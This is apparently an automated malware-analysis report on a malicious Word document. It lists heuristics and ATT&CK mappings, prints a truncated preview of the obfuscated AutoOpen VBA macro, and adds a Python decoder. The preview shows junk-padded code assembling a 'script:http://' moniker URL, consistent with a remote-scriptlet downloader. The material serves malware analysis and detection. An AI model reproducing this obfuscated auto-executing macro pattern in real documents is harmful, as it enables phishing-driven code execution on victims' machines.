Verdict: MALICIOUS
Risk Score: 162
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1203 Exploitation for Client Execution (listed by the analyzer; note that the evidence in this report is macro execution after the user enables content, which maps to T1204.002 User Execution: Malicious File, not to an exploited parser bug)
The sample is a malicious Office document containing a VBA macro. An AutoOpen macro is present, so the code runs as soon as the document is opened with macros enabled. The macro is heavily obfuscated: most statements are junk assignments (Array, CDate, InStr, LBound, Val) that compute nothing useful, and the payload string is assembled one fragment at a time through IIf calls whose arithmetic conditions are always true. The fragments visible in the preview ("scrip", "t:htt", "p://a", "ninsn", "asdne") concatenate to "script:http://aninsnasdne" before the preview is truncated, i.e. the prefix of a script: moniker URL. Together with the GetObject call flagged below, this is consistent with a downloader/dropper that fetches and executes a remote scriptlet. The legacy WordBasic auto-exec marker is further evidence of the auto-execution surface but, as the heuristic itself notes, is not downloader evidence on its own.
Heuristics (6)

- VBA macros detected (medium, 3 related findings), OLE_VBA_MACROS: Document contains VBA macro code.
- AutoOpen macro (high), OLE_VBA_AUTOOPEN: AutoOpen macro; runs automatically when the document is opened with macros enabled.
- GetObject call (high), OLE_VBA_GETOBJ: GetObject call; GetObject resolves monikers such as script: (remote scriptlet) or winmgmts: (WMI), both of which can be used to execute code.
- VBA p-code auto-exec with execution tokens (high), OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium), OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info), EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier present in any document with drawing content; it is not a network indicator and should not be treated as a C2 or download URL.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12065 bytes | adae667031139a6386f65dfd33d3261f88627fee9e4e4f7aa8b98d791bc85528 |
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
papajyzeainulib = Array("qesadyloke", "kutaneaufahozo", "lydexoqemijic", "wepaqib")
fohahybyzud = "dabaqo" & Val("49720 dabaqo")
cubaii = LBound(Array("catygujibom", "ciieavua", "ruromozeva"))
On Error Resume Next
ucmaqubyj = CDate(97692)
nodgiaretuta = Array("ytosazy", "xebalovsgy", "novvecet", "xonugudytakosy", "mvigucbsi")
miviiowe = "fujb" & Val("27446 fujb")
lajkopunaci = CDate(56388)
nyhezoidybs = InStr("xdetiiupaaji", "xdetiiupaaji")
eebaai = "duqaxc" & Val("96347 duqaxc")
naxaqqotyf = Array("cilixeqtxije", "nyfeli", "xudoze", "gefuhiaovpa", "fohkiseis")
qinutihoqy = CDate(42031)
giysaxtemyc = "agagogq" & Val("28946 agagogq")
pycyrobiqi = CDate(98109)
tcuionoz = InStr("vuwukyguce", "vuwukyguce")
jyhuwi = InStr("belixukekcud", "belixukekcud")
nyimuhqafa = "pypai"
nocuziaid = CDate(55461)
rucer = CDate(82637)
goleg = "lubibitrexepa"
xucaioiu = LBound(Array("pypafydzez", "nyreaazj", "wananx", "wedamycoxyw", "qozovox"))
wtzy = "byxuwafoxqut" & Val("31068 byxuwafoxqut")
rivwoya = "pauwiravs"
geqyqyhyl = CDate(77101)
'piriquokiva18928 piriquokiva
zuroc = LBound(Array("kygoaycasiryjy", "aamedywyilajap", "gtacumpob", "tekjanfifju", "dobilygecazi"))
vhtyqu = Array("mukexle", "oled", "ruqix", "hecaqoqohovinov", "xyrafqnso")
'ciahanagmy13453 ciahanagmy
repuz = Array("iotaaonexoge", "byaex", "iaxovevozixefun")
jmeqcorixi = "sobujegaxav" & Val("7316 sobujegaxav")
pucydocul = CDate(6971)
fasaoqayfu = Array("ayqecimzylezol", "hadusatenuzojyq", "raile")
kypasen = vbNullString
'muhiaem57388 muhiaem
zyfipopwalix = "xumajyra"
uzeacateqo = LBound(Array("vulerodcko", "giqexito", "lapipyiufimo", "qynixehegovogev"))
lonek = "twasih"
wvuridubufi = "soyzijykf"
'gesywiqiioi52677 gesywiqiioi
defugiqi = "iezofejigigok" & Val("28029 iezofejigigok")
juzip = "lyaahaai" & Val("9517 lyaahaai")
'kutisby92896 kutisby
zyiyqodyju = CDate(8057)
buqagu = CDate(48678)
ijiseagi = "cyqix"
sonryfa = InStr("hogepaaibagaw", "hogepaaibagaw")
hozgru = InStr("guwaqmuxy", "guwaqmuxy")
cutecmuwif = LBound(Array("bpudarymul", "pexx", "qixojaroqyvk"))
usiiyd = Array("zujoja", "mukifotyrej", "wkixajype", "lorydikofezyp", "banenoluiil")
auckix = CDate(90988)
pynupides = CDate(16117)
jopfeba = InStr("cupasuzego", "cupasuzego")
'qiqaf74677 qiqaf
iutohavemax = LBound(Array("vugujuguhegehi", "tejoirahyfilar", "diekyhivyze", "pezaciudy"))
zotymixijydabu = CDate(21443)
xijb = Array("zidiyqme", "zuxyxam", "gapaiij", "nibyfaw")
vxoc = CDate(16200)
iekansybov = "kadulad" & Val("53870 kadulad")
'auimehvusyb49211 auimehvusyb
kypasen = kypasen + IIf((81 + 162) = 243, "scrip", "Ipd")
myru = CDate(49891)
lmocoiocodotib = LBound(Array("xoieto", "joydogijurijar", "lycinoaai"))
jejiaire = LBound(Array("viaa", "aozyxoky", "vovidafixav", "gapeciqipadow", "faaai", "iaaelijyfeg"))
kypasen = kypasen + IIf((246 + 492) = 738, "t:htt", "X")
wviayfim = "viginonyfogak"
lylikiziaiax = "kmagic"
xokisoaovuiip = CDate(76854)
rigab = "obuwfygoiyn"
kypasen = kypasen + IIf((186 + 372) = 558, "p://a", "JP5po")
jimuhutun = LBound(Array("conawaa", "cuifatco", "dvdazud", "ruiuaebysobitu", "pogekmizu"))
'qaayiaryfw20767 qaayiaryfw
'mlegesul47415 mlegesul
kypasen = kypasen + IIf((117 + 234) = 351, "ninsn", "Jf")
lodyjitewaqe = CDate(56876)
roqepija = Array("ykiaga", "raiihi", "noautevak", "weiuned", "xakxe")
tidot = Array("weairwopyqe", "figujufma", "leeq", "cevekuvdop", "kydiwywel")
huswywaw = LBound(Array("hikat", "fidojyzenpyv", "nygqy", "veveokyzyvi", "qupiteixaiolu"))
spuduag = "sytyhif" & Val("38120 sytyhif")
nuaemucitoxoq = InStr("zicuii", "zicuii")
'pixijeiyg81180 pixijeiyg
yluku = InStr("gipubegezetud", "gipubegezetud")
kypasen = kypasen + IIf((129 + 258) = 387, "asdne", "XK")
tonh
... (truncated)
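The string-assembly pattern in the preview above is simple enough to decode mechanically. The following is an added example, not code from the analyzer or from oletools: it evaluates the arithmetic condition of each `name = name + IIf((a + b) = c, "x", "y")` statement instead of blindly taking the first literal, counts how many lines are junk versus payload, and flags any assembled string that begins with a moniker GetObject would resolve. The names `MACRO_SNIPPET`, `deobfuscate`, `classify` and `find_monikers` are the example's own; the sample input is constructed from the lines visible in the preview, so the decoded value is only the visible prefix "script:http://aninsnasdne" and the rest of the URL stays unknown because the page truncates the macro.

```python
"""Decode the IIf string-assembly obfuscation seen in the AutoOpen macro.

Added example, not part of the analyzer's report or of oletools. The macro
hides a few payload statements of the form
    name = name + IIf((a + b) = c, "real", "decoy")
inside a long stream of junk assignments. The arithmetic is always true in
this sample, but the decoder evaluates it rather than assuming, so a sample
that flips a condition to always-false still decodes correctly.
"""
import re

# Constructed input: payload lines copied from the preview above, interleaved
# with a few of its junk statements. The real macro is truncated on the page.
MACRO_SNIPPET = r'''
Sub AutoOpen()
papajyzeainulib = Array("qesadyloke", "kutaneaufahozo", "lydexoqemijic", "wepaqib")
fohahybyzud = "dabaqo" & Val("49720 dabaqo")
On Error Resume Next
ucmaqubyj = CDate(97692)
nyhezoidybs = InStr("xdetiiupaaji", "xdetiiupaaji")
kypasen = vbNullString
'auimehvusyb49211 auimehvusyb
kypasen = kypasen + IIf((81 + 162) = 243, "scrip", "Ipd")
myru = CDate(49891)
kypasen = kypasen + IIf((246 + 492) = 738, "t:htt", "X")
kypasen = kypasen + IIf((186 + 372) = 558, "p://a", "JP5po")
kypasen = kypasen + IIf((117 + 234) = 351, "ninsn", "Jf")
cutecmuwif = LBound(Array("bpudarymul", "pexx", "qixojaroqyvk"))
kypasen = kypasen + IIf((129 + 258) = 387, "asdne", "XK")
'''

# name = name + IIf((a + b) = c, "yes", "no")   ('+' or '&' both concatenate)
IIF_APPEND = re.compile(
    r'^\s*(?P<name>\w+)\s*=\s*(?P=name)\s*[+&]\s*IIf\(\s*'
    r'\(\s*(?P<a>\d+)\s*\+\s*(?P<b>\d+)\s*\)\s*=\s*(?P<c>\d+)\s*,\s*'
    r'"(?P<yes>[^"]*)"\s*,\s*"(?P<no>[^"]*)"\s*\)\s*$'
)
# name = vbNullString   (accumulator initialisation)
INIT = re.compile(r'^\s*(?P<name>\w+)\s*=\s*(?:vbNullString|"")\s*$')
# Junk assignments whose results are never used by the payload.
JUNK = re.compile(r'^\s*\w+\s*=\s*(?:Array\(|CDate\(|InStr\(|LBound\(|"[^"]*"\s*&\s*Val\()')

# Monikers GetObject() resolves that lead to code execution: "script:" fetches
# and runs a COM scriptlet from the URL after it; "winmgmts:" hands back the
# WMI service, which can spawn processes; "new:" instantiates a CLSID.
EXEC_MONIKERS = ("script:", "winmgmts:", "new:")


def deobfuscate(vba):
    """Return {variable: assembled string} for every IIf-accumulated string."""
    strings = {}
    for line in vba.splitlines():
        m = INIT.match(line)
        if m:
            strings[m.group("name")] = ""
            continue
        m = IIF_APPEND.match(line)
        if m:
            cond = int(m.group("a")) + int(m.group("b")) == int(m.group("c"))
            piece = m.group("yes") if cond else m.group("no")
            strings[m.group("name")] = strings.get(m.group("name"), "") + piece
    return strings


def classify(vba):
    """Count junk, comment, payload and other lines: the signal-to-noise ratio."""
    counts = {"junk": 0, "comment": 0, "payload": 0, "other": 0}
    for line in vba.splitlines():
        s = line.strip()
        if not s:
            continue
        if s.startswith("'"):
            counts["comment"] += 1
        elif JUNK.match(s):
            counts["junk"] += 1
        elif INIT.match(s) or IIF_APPEND.match(s):
            counts["payload"] += 1
        else:
            counts["other"] += 1
    return counts


def find_monikers(strings):
    """Flag assembled strings that start with a moniker GetObject would execute."""
    hits = []
    for name, value in strings.items():
        for prefix in EXEC_MONIKERS:
            if value.lower().startswith(prefix):
                hits.append((name, prefix.rstrip(":"), value))
    return hits


if __name__ == "__main__":
    decoded = deobfuscate(MACRO_SNIPPET)
    print("line classes:", classify(MACRO_SNIPPET))
    for var, value in decoded.items():
        print(f"{var} = {value!r}")
    for var, moniker, value in find_monikers(decoded):
        target = value[len(moniker) + 1:]
        print(f"[!] {var} is a '{moniker}:' moniker; GetObject would fetch {target!r}")
```

Run against the full macros.bas rather than the snippet to recover the complete URL; if a sample uses a different accumulator shape (Chr() tables, Mid() slices, string reversal), extend the regexes rather than the evaluator. olevba's `--deobf` option performs a similar evaluation of constant VBA expressions and is the first thing to try before writing a custom decoder.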